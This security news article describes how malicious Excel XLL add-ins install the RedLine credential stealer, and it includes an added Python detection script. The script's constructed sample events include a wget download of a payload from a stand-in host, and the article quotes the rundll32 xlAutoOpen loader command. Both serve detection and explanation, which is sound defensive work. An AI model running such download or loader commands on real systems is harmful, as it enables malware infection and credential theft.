Threat Actors are Using Malicious Microsoft Excel files to Steal Banking Credentials

 

Threat actors are spreading Excel XLL files that download and install the RedLine password and information-stealing malware via website contact forms and discussion forums. 

RedLine is a credential-theft malware that steals cookies, user names and passwords, and banking details stored in web browsers, as well as FTP credentials and files from a compromised device. 

The malware can also execute commands, download and run further malware, and take screenshots of the active Windows screen. The stolen data is sent back to the attackers to be sold on the dark web or used for other malicious activities. 

XLL files are essentially dynamic link libraries (DLLs), with the addition of an 'xlAutoOpen' function that Excel runs. The add-in allows Excel to read and write data, import it from other sources, create custom functions and perform multiple tasks. 

However, when the DLL is executed manually with the regsvr32.exe command or the 'rundll32 name.xll, xlAutoOpen' command, it extracts the wget.exe program to the %UserProfile% folder and uses it to download the RedLine binary from a remote site.
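The behaviour described above can be hunted for in process-creation telemetry. The following is an added example, not part of the original article: the event layout, host names, paths, the assumption that %UserProfile% resolves to C:\Users\<name>, and the five-minute correlation window are all assumptions, and the sample events are constructed.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation events: (host, time, image path, command line).
SAMPLE_EVENTS = [
    ("ws01", "2022-01-10T09:00:01", r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     r'"EXCEL.EXE" C:\Users\amy\Documents\budget.xlsx'),
    ("ws02", "2022-01-10T09:05:10", r"C:\Windows\System32\rundll32.exe",
     r"rundll32 C:\Users\bob\Downloads\terms.xll, xlAutoOpen"),
    ("ws02", "2022-01-10T09:05:14", r"C:\Users\bob\wget.exe",
     r"C:\Users\bob\wget.exe http://example.invalid/payload.exe"),
    ("ws03", "2022-01-10T09:30:00", r"C:\Windows\System32\regsvr32.exe",
     r"regsvr32.exe /s C:\Users\eve\AppData\Local\Temp\quote.XLL"),
    ("ws04", "2022-01-10T10:00:00", r"C:\tools\wget.exe",
     r"wget.exe https://example.invalid/readme.txt"),
]

# rundll32/regsvr32 as the process image, with or without a directory prefix.
XLL_LOADER = re.compile(r"(?i)^(?:.*\\)?(rundll32|regsvr32)(?:\.exe)?$")
# Any argument ending in .xll, whatever its case.
XLL_ARG = re.compile(r"(?i)\.xll\b")
# wget.exe sitting directly in a user profile root (assumed C:\Users\<name>).
PROFILE_WGET = re.compile(r"(?i)^[a-z]:\\users\\[^\\]+\\wget\.exe$")
WINDOW = timedelta(minutes=5)  # assumed correlation window


def detect(events):
    """Return (host, time, rule) findings for XLL loads and the wget drop that follows."""
    findings, last_xll = [], {}
    for host, ts, image, cmdline in sorted(events, key=lambda e: e[1]):
        when = datetime.fromisoformat(ts)
        loader = XLL_LOADER.match(image)
        if loader and XLL_ARG.search(cmdline):
            last_xll[host] = when
            findings.append((host, ts, "xll_loaded_via_" + loader.group(1).lower()))
        elif PROFILE_WGET.match(image):
            seen = last_xll.get(host)
            chained = seen is not None and when - seen <= WINDOW
            findings.append((host, ts, "wget_in_profile_after_xll" if chained else "wget_in_profile"))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The chained rule is the higher-confidence signal; a lone wget.exe in a profile root is worth a look but can be a developer's own copy.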

Once the malware is installed by the victim, it searches for valuable information to steal, including credentials and credit cards stored in the Chrome, Edge, Firefox, Brave, and Opera browsers. Therefore, if you receive an email or other message distributing these types of files, simply delete the message and report it as spam. 

As XLL files are executables, threat actors can use them to perform a variety of malicious actions on a device. Users should be careful when receiving these files and should make sure they come from a trusted source before opening them. 

According to security experts, XLL files are rarely sent as attachments but are instead installed through another program or by your Windows admin. Thus, any such file that arrives in the mail should be handled with extra caution. Aside from being vigilant with attachments and links in emails, users should also keep their endpoints secure with strong and refreshed passwords, and make sure their systems run safeguards such as antivirus solutions and firewalls.